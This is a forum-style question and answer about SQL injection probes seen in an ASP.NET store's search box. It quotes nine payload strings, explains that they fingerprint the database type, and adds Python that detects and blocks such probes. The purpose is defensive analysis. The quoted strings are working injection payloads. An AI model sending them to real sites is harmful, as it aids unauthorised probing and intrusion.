SQL Injection pattern in store search
Question
Since early morning today, we have been getting the following search queries in our ecommerce store. I understand it's SQL injection. We are also using parameterized queries, so it didn't do any harm. But because of the length of the query, the full-text search took time to process and ended up timing out, and the website hung for a while.
Immediately, I restricted the maximum characters for search to 75 and added logic to detect SQL injection and prevent it from reaching SQL Server, as additional safety.
Our environment: ASP.NET ecommerce site, SQL Server 2012 Express DB with full-text search, Windows 2012 Standard Server.
I am just wondering what the searcher is trying to learn or find out. Or are they just trying to hang the website? Can this be ignored after the fixes mentioned above?
Search terms are given below. "Enter Model Number or Cartridge Code" is our default search text box text.
Enter Model Number or Cartridge Code) AND 2895=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(112)||CHR(97)||CHR(122)||CHR(113)||(SELECT (CASE WHEN (2895=2895) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(119)||CHR(99)||CHR(121)||CHR(113)||CHR(62))) FROM DUAL) AND (9170=9170
Enter Model Number or Cartridge Code') AND 3733=CONVERT(INT,(SELECT CHAR(113)+CHAR(113)+CHAR(104)+CHAR(106)+CHAR(113)+(SELECT (CASE WHEN (3733=3733) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(106)+CHAR(113)+CHAR(107)+CHAR(113))) AND ('KzHP'='KzHP
Enter Model Number or Cartridge Code%' AND (SELECT 2396 FROM(SELECT COUNT(*),CONCAT(0x7170617a71,(SELECT (CASE WHEN (2396=2396) THEN 1 ELSE 0 END)),0x7177637971,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND '%'='
Enter Model Number or Cartridge Code%' AND 4201=CONVERT(INT,(SELECT CHAR(113)+CHAR(112)+CHAR(97)+CHAR(122)+CHAR(113)+(SELECT (CASE WHEN (4201=4201) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(119)+CHAR(99)+CHAR(121)+CHAR(113))) AND '%'='
Enter Model Number or Cartridge Code') AND 6442=CAST((CHR(113)||CHR(112)||CHR(97)||CHR(122)||CHR(113))||(SELECT (CASE WHEN (6442=6442) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(119)||CHR(99)||CHR(121)||CHR(113)) AS NUMERIC) AND ('iWJF'='iWJF
Enter Model Number or Cartridge Code AND 3733=CONVERT(INT,(SELECT CHAR(113)+CHAR(113)+CHAR(104)+CHAR(106)+CHAR(113)+(SELECT (CASE WHEN (3733=3733) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(106)+CHAR(113)+CHAR(107)+CHAR(113)))-- ZgIZ
Enter Model Number or Cartridge Code) AND 6442=CAST((CHR(113)||CHR(112)||CHR(97)||CHR(122)||CHR(113))||(SELECT (CASE WHEN (6442=6442) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(119)||CHR(99)||CHR(121)||CHR(113)) AS NUMERIC) AND (8167=8167
Enter Model Number or Cartridge Code AND 3733=CONVERT(INT,(SELECT CHAR(113)+CHAR(113)+CHAR(104)+CHAR(106)+CHAR(113)+(SELECT (CASE WHEN (3733=3733) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(106)+CHAR(113)+CHAR(107)+CHAR(113)))
Enter Model Number or Cartridge Code AND 6442=CAST((CHR(113)||CHR(112)||CHR(97)||CHR(122)||CHR(113))||(SELECT (CASE WHEN (6442=6442) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(119)||CHR(99)||CHR(121)||CHR(113)) AS NUMERIC)-- CuDa
Recommended answer
As a SQL injection expert, it seems that these are only generic queries to understand whether a SQL injection exists and which DB type it is. You can see that in some cases he used CHR, which is Oracle's version of number-to-char, and in other cases he used CHAR, which is the function name in other DBs (SQL Server), and in another case he addressed the INFORMATION_SCHEMA.CHARACTER_SETS table, which is a table in MySQL. He simply sent several general queries to find injections and the DB type. Nonetheless, if your site hung because of this, you should perform some better input validation of special characters (brackets?) in addition to the length validation.
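Defender-side triage for the probes the answer describes, added here as an example (not code from the question or the answer): it applies the 75-character cap from the question, blocks anything that looks like a probe before it reaches the full-text index, and guesses which DBMS each probe was written for from its syntax. The Oracle, SQL Server and MySQL markers follow the answer; recognising `::text` / `CAST ... AS NUMERIC` as PostgreSQL goes beyond it. The regexes, function names and the sample list are assumptions; the four probe strings are copied from the question.

```python
import re
from collections import Counter

MAX_SEARCH_LEN = 75  # the cap the question's author put on the search box

# Dialect fingerprints: the syntax each probe needs in order to parse on its target DBMS.
# Oracle, SQL Server and MySQL markers follow the answer; the PostgreSQL row is an addition.
DIALECT_MARKERS = [
    ("postgresql", re.compile(r"::text|CAST\(.*\bAS\s+NUMERIC\b", re.I | re.S)),
    ("oracle", re.compile(r"\bFROM\s+DUAL\b|\bXMLType\s*\(", re.I)),
    ("mysql", re.compile(r"INFORMATION_SCHEMA\.CHARACTER_SETS|\bRAND\(0\)|CONCAT\(0x", re.I)),
    ("sqlserver", re.compile(r"CONVERT\(\s*INT\s*,|CHAR\(\d+\)\s*\+", re.I)),
]
# Shape every probe on the page shares: a tautology N=N or 'x'='x, a CASE WHEN, or a trailing -- comment.
PROBE_SHAPE = re.compile(r"\b(\d+)=\1\b|'(\w+)'='\2|\bCASE\s+WHEN\b|--\s*\w*\s*$", re.I)


def triage_search(term: str) -> dict:
    """Decide before the query reaches SQL Server: allow, or block with reasons and a DBMS guess."""
    dialect = next((name for name, rx in DIALECT_MARKERS if rx.search(term)), None)
    probe = dialect is not None or PROBE_SHAPE.search(term) is not None
    reasons = []
    if probe:
        reasons.append("sqli-probe")
    if len(term) > MAX_SEARCH_LEN:  # the length check alone would have prevented the hang
        reasons.append("too-long")
    return {"allow": not reasons, "reasons": reasons,
            "dialect": dialect if dialect else ("unknown" if probe else None)}


def probe_dialects(terms) -> Counter:
    """Tally blocked probes per dialect; one hit per DBMS from one client is a fingerprinting sweep."""
    return Counter(r["dialect"] for r in map(triage_search, terms) if "sqli-probe" in r["reasons"])


# Constructed log sample: a legitimate lookup, an over-long but harmless string, and four of the
# probes quoted in the question (one per dialect).
SAMPLE_SEARCHES = [
    "TN-2420",
    "a" * 80,
    "Enter Model Number or Cartridge Code) AND 2895=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(112)||CHR(97)||CHR(122)||CHR(113)||(SELECT (CASE WHEN (2895=2895) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(119)||CHR(99)||CHR(121)||CHR(113)||CHR(62))) FROM DUAL) AND (9170=9170",
    "Enter Model Number or Cartridge Code') AND 3733=CONVERT(INT,(SELECT CHAR(113)+CHAR(113)+CHAR(104)+CHAR(106)+CHAR(113)+(SELECT (CASE WHEN (3733=3733) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(106)+CHAR(113)+CHAR(107)+CHAR(113))) AND ('KzHP'='KzHP",
    "Enter Model Number or Cartridge Code%' AND (SELECT 2396 FROM(SELECT COUNT(*),CONCAT(0x7170617a71,(SELECT (CASE WHEN (2396=2396) THEN 1 ELSE 0 END)),0x7177637971,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND '%'='",
    "Enter Model Number or Cartridge Code') AND 6442=CAST((CHR(113)||CHR(112)||CHR(97)||CHR(122)||CHR(113))||(SELECT (CASE WHEN (6442=6442) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(119)||CHR(99)||CHR(121)||CHR(113)) AS NUMERIC) AND ('iWJF'='iWJF",
]

if __name__ == "__main__":
    for term in SAMPLE_SEARCHES:
        print(triage_search(term))
    print(probe_dialects(SAMPLE_SEARCHES))
```

Parameterized queries remain the control that stopped the injection; this only keeps probe traffic off the SQL Server full-text engine and labels it for the logs.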